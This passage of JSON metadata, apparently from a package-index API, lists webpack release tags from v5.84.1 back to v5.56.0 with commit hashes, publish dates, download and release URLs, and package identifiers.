_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_u